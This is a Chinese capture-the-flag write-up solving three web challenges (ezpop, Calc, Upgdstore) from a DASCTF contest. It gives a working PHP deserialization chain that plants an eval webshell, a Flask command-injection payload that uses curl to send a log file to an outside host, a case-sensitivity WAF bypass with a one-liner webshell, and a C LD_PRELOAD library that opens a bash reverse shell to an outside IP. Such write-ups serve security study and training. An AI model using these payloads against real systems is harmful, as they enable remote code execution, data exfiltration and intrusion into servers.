目录

ezpop

Calc：

Upgdstore：

ezpop

<?phpclasscrow{public$v1;public$v2;functioneval(){echonew$this->v1($this->v2);}publicfunction__invoke(){$this->v1->world();}}classfin{public$f1;publicfunction__destruct(){echo$this->f1.'114514';}publicfunctionrun(){($this->f1)();}publicfunction__call($a,$b){echo$this->f1->get_flag();}}classwhat{public$a;publicfunction__toString(){$this->a->run();return'hello';}}classmix{public$m1;publicfunctionrun(){($this->m1)();}publicfunctionget_flag(){eval('#'.$this->m1);}}if(isset($_POST['cmd'])){unserialize($_POST['cmd']);}else{highlight_file(__FILE__);}

反序列化，修改crow中v1的值，利用crow中的eval跳到mix中，利用eval函数来执行命令。

利用链：

fin::__destruct->what::__toString->fin::_run->crow::__invoke->fin::_call->mix::get_flag

Exp：

<?phpclass crow{public $v1;public $v2;public function __construct(){$this->v1=new fin();$this->v1->f1=new mix();$this->v1->f1->m1="?><?=eval(\$_POST[1]);";}}class fin{public $f1;public function __construct(){$f1=$this->f1;}}class what{public $a;public function __construct(){$this->a=new fin();$this->a->f1=new crow();}}class mix{public $m1;public function __construct(){$m1=$this->m1;}}$a=new fin();$a->f1=new what();echo serialize($a);

payload：（蚁剑的密码）

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

然后cat找flag即可。

Calc：

源码：

#coding=utf-8from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directoryimport randomfrom urllib import parseimport osfrom werkzeug.utils import secure_filenameimport timeapp=Flask(__name__)def waf(s):blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']flag = Truefor no in blacklist:if no.lower() in s.lower():flag= Falseprint(no)breakreturn flag@app.route("/")def index():"欢迎来到SUctf"return render_template("index.html")@app.route("/calc",methods=['GET'])def calc():ip = request.remote_addrnum = request.values.get("num")log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)if waf(num):try:data = eval(num)os.system(log)except:passreturn str(data)else:return "waf!!"if __name__ == "__main__":app.run(host='0.0.0.0',port=5000)

提交时会请求/calc路由并提交num参数，源码中当访问calc路由后会进入calc函数，接收num参数，拼接到log里面，再经过waf函数，没有被过滤会先执行eval，然后执行system函数。

Waf中过滤了括号，但没有禁用反引号，所以可以执行system函数。

Payload：

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23ls

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23cat%09Th1s*

Upgdstore：

过滤了一大堆函数，只有少数几个可以用。

base64_decode没有被过滤，可以利用show_source查看源码。

<?phpbase64_decode("c2hvd19zb3VyY2U=")("index.php");得到源码：<divclass="light"><spanclass="glow"><formenctype="multipart/form-data"method="post"onsubmit="returncheckFile()">嘿伙计，传个火？！<inputclass="input_file"type="file"name="upload_file"/><inputclass="button"type="submit"name="submit"value="upload"/></form></span><spanclass="flare"></span><div><?phpfunctionfun($var):bool{$blacklist=["\$_","eval","copy","assert","usort","include","require","$","^","~","-","%","*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close","proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport","syslog","popen","show_source","highlight_file","`","chmod"];foreach($blacklistas$blackword){if(strstr($var,$blackword))returnTrue;}returnFalse;}error_reporting(0);//设置上传目录define("UPLOAD_PATH","./uploads");$msg="UploadSuccess!";if(isset($_POST['submit'])){$temp_file=$_FILES['upload_file']['tmp_name'];$file_name=$_FILES['upload_file']['name'];$ext=pathinfo($file_name,PATHINFO_EXTENSION);if(!preg_match("/php/i",strtolower($ext))){die("只要好看的php");}$content=file_get_contents($temp_file);if(fun($content)){die("诶，被我发现了吧");}$new_file_name=md5($file_name).".".$ext;$img_path=UPLOAD_PATH.'/'.$new_file_name;if(move_uploaded_file($temp_file,$img_path)){$is_upload=true;}else{$msg='UploadFailed!';die();}echo'<divstyle="color:#F00">'.$msg."Lookhere~".$img_path."</div>";}

strstr()函数对大小写敏感，可以利用大小写绕过waf。

利用base64先上传一句话木马。

<?php @eval($_POST['a']);?>#f82ffc0257783176e9c79a42e32657d0.php

再上传一个php文件使用include来包含刚刚的一句话，利用伪协议对base64进行解码。

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA==

<?phpInclude(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA=="));

之后上传上传exp.c和gconv-modules

构造恶意的exp.c

#include <stdlib.h>#include <stdio.h>#include <string.h>void payload(){system("bash -c 'exec bash -i &>/dev/tcp/ip/6666 <&1'");}int geteuid(){if (getenv("LD_PRELOAD") == NULL){return 0;}unsetenv("LD_PRELOAD");payload();}

然后编译成so文件。

利用move_uploaded_file进行文件上传

然后访问反弹shell。

a=putenv("LD_PRELOAD=/var/www/html/uploads/exp.so");mail("","","","","");

如果觉得《DASCTF X SU 三月春季挑战赛 web复现》对你有帮助，请点赞、收藏，并留下你的观点哦！